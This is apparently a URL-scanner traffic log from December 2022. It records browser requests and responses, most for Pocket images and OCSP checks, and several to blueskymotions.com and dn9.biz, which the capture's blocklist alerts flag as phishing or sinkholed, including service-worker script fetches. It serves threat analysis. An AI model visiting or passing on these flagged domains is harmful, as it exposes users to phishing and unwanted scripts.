Md5:    b986f9fcbeca91ed5c8d58fbfaf47d19
Sha1:   6e6c8bd2bce144cc4da1cd7be375b046b60dca79
Sha256: 07a8938d2841f8c13bd646f4e79e41e46acd6463aa019cd70871b3741f12bb4f
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6b6b798b-d396-454d-9d5b-17b47827e4ad.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 2942
x-amzn-requestid: ed26679f-cd56-477f-9914-f9afbcaaeea6
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cfGeoGFYoAMFWgA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63891df7-4ec6bebe21656d5026456994;Sampled=0
x-amzn-remapped-date: Thu, 01 Dec 2022 21:34:47 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: XvG2dAUeB914GQ1qJwQRHovAtra8OSjG-CsXeR8UOBq5r8qVjEbPBQ==
via: 1.1 e291f351a18746d40754b367095a2872.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 05:02:08 GMT
age: 16571
etag: "9fc7ab3a4eb2d36fd6df7e0267a26a47627d1704"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   2942
Md5:    b47431190f34eccf0a6efb98e2a32b7d
Sha1:   9fc7ab3a4eb2d36fd6df7e0267a26a47627d1704
Sha256: 08d3b6be354cafb70c20e6865788cb375adbf88d47711651fe1a3b855094daf2
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3d568a89-ee21-427a-b971-0d1500164a62.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11942
x-amzn-requestid: ba8a5d03-7796-4c6d-a6df-3cc71b1c5259
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: chqukGmWoAMFtLg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638a24c3-609dc90d769060d30a16e3df;Sampled=0
x-amzn-remapped-date: Fri, 02 Dec 2022 16:16:03 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: m6j_3bDGFIAHQYzrZ1zXqUb-HbEJ8XCoGH5mgBFOWRbLzoSiuNBnhg==
via: 1.1 030fe0607711293dda988e571617a9f2.cloudfront.net (CloudFront), 1.1 324a68a6c25ee50d774953f3e15a611c.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Dec 2022 21:59:25 GMT
age: 41934
etag: "c8bd6bd9086e0a52b83b89dfd755e7ebba222fb8"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11942
Md5:    becc8cdba57494c6fe212eb67634e1eb
Sha1:   c8bd6bd9086e0a52b83b89dfd755e7ebba222fb8
Sha256: fbb25b88b10a818bb0c6ad385b1e5ba54b87672c73bfa8a9c1ecb17dcc689d5a
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F73b53015-e415-4fff-9252-8a16bbe000f5.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9715
x-amzn-requestid: c8102cfa-78dc-4d81-ad6a-e16b9132e238
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ciZO2HQKIAMF8IA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638a6f2b-350c586b568e6565763376bd;Sampled=0
x-amzn-remapped-date: Fri, 02 Dec 2022 21:33:31 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 0QkVKyYm9UwlF5FEeli9UsRAQwEi3-c3bMR-QSJxIKRQe7WWT76dGQ==
via: 1.1 030fe0607711293dda988e571617a9f2.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Dec 2022 21:51:06 GMT
age: 42433
etag: "d4b3052021ff3ad1dc4134fa25eb12a98e7c17da"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9715
Md5:    45182367fd4f8b6dd234eef1022acdb1
Sha1:   d4b3052021ff3ad1dc4134fa25eb12a98e7c17da
Sha256: a57fadaf74db2fb457cfe761314d56f021d22146f5bdb6a8bf11b6519e8a558d
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "F7230D20904AF254078DCF580EBDE1F297F63ECC2AC45DF43EADC99F06028565"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3753
Expires: Sat, 03 Dec 2022 10:40:52 GMT
Date: Sat, 03 Dec 2022 09:38:19 GMT
Connection: keep-alive

                                        
                                            GET /w76899721.js HTTP/1.1 
Host: blueskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c
Sec-Fetch-Dest: serviceworker
Sec-Fetch-Mode: same-origin
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         185.177.94.108
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:20 GMT
content-length: 48
last-modified: Sun, 09 Oct 2022 10:34:25 GMT
etag: "6342a3b1-30"
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   48
Md5:    3e9d44b14a3a87708af76ce7b75e647f
Sha1:   df92b3c1d3ee9740a8145cae2214e429b8f714a3
Sha256: 2f5700ca5b37899ece7d2abeac319e9988aa1699a1d858cd84bc43e70900bfe0

Alerts:
  Blocklists:
    - fortinet: Phishing
    - quad9: Sinkholed
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "5A51E175F2D02B50BEF89944F82F6F7B753D013F71099B49D25CE6DD2A68600B"
Last-Modified: Thu, 01 Dec 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=1467
Expires: Sat, 03 Dec 2022 10:02:47 GMT
Date: Sat, 03 Dec 2022 09:38:20 GMT
Connection: keep-alive

                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 0.blueskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.blueskymotions.com/?auf=mztdcolgg45diojygyxtonjwgmxtemrpge3dombqgyydeojz&s=1&sub1=&sub2=dfastspeed16&sub3=&sub4=&cpc=0&cpm=0
Cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c; uuid=60111c05-67ad-43fb-ab40-d389f156015c; uuid=60111c05-67ad-43fb-ab40-d389f156015c
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         185.177.94.108
HTTP/2 204 No Content
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:20 GMT
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /w76899721.js HTTP/1.1 
Host: 0.blueskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c; uuid=60111c05-67ad-43fb-ab40-d389f156015c; uuid=60111c05-67ad-43fb-ab40-d389f156015c
Sec-Fetch-Dest: serviceworker
Sec-Fetch-Mode: same-origin
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         185.177.94.108
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:20 GMT
content-length: 48
last-modified: Sun, 09 Oct 2022 10:34:25 GMT
etag: "6342a3b1-30"
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   48
Md5:    3e9d44b14a3a87708af76ce7b75e647f
Sha1:   df92b3c1d3ee9740a8145cae2214e429b8f714a3
Sha256: 2f5700ca5b37899ece7d2abeac319e9988aa1699a1d858cd84bc43e70900bfe0

Alerts:
  Blocklists:
    - fortinet: Phishing
    - quad9: Sinkholed
                                        
                                            GET /?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed16 HTTP/1.1 
Host: blueskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://away.cdnbestplatform.com/
Cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         185.177.94.108
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:19 GMT
access-control-allow-origin: *
set-cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c; expires=Mon, 02-Jan-2023 09:38:19 GMT; Max-Age=2592000; path=/; domain=blueskymotions.com
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed16 HTTP/1.1 
Host: 0.blueskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://blueskymotions.com/
Cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c; uuid=60111c05-67ad-43fb-ab40-d389f156015c; uuid=60111c05-67ad-43fb-ab40-d389f156015c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
TE: trailers

search
                                         185.177.94.108
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:19 GMT
access-control-allow-origin: *
set-cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c; expires=Mon, 02-Jan-2023 09:38:19 GMT; Max-Age=2592000; path=/; domain=0.blueskymotions.com
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /sw/w1s.js HTTP/1.1 
Host: dn9.biz
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         62.210.13.162
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:20 GMT
access-control-allow-origin: *
expires: Sun, 03 Dec 2023 09:38:20 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /?auf=mztdcolgg45diojygyxtonjwgmxtemrpge3dombqgyydeojz&s=1&sub1=&sub2=dfastspeed16&sub3=&sub4=&cpc=0&cpm=0 HTTP/1.1 
Host: 0.blueskymotions.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.blueskymotions.com/?p=meygky3cmm5gi3bpg42tmmy&sub2=dfastspeed16
Cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c; uuid=60111c05-67ad-43fb-ab40-d389f156015c; uuid=60111c05-67ad-43fb-ab40-d389f156015c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         185.177.94.108
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Sat, 03 Dec 2022 09:38:20 GMT
access-control-allow-origin: *
set-cookie: uuid=60111c05-67ad-43fb-ab40-d389f156015c; expires=Mon, 02-Jan-2023 09:38:19 GMT; Max-Age=2592000; path=/
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - quad9: Sinkholed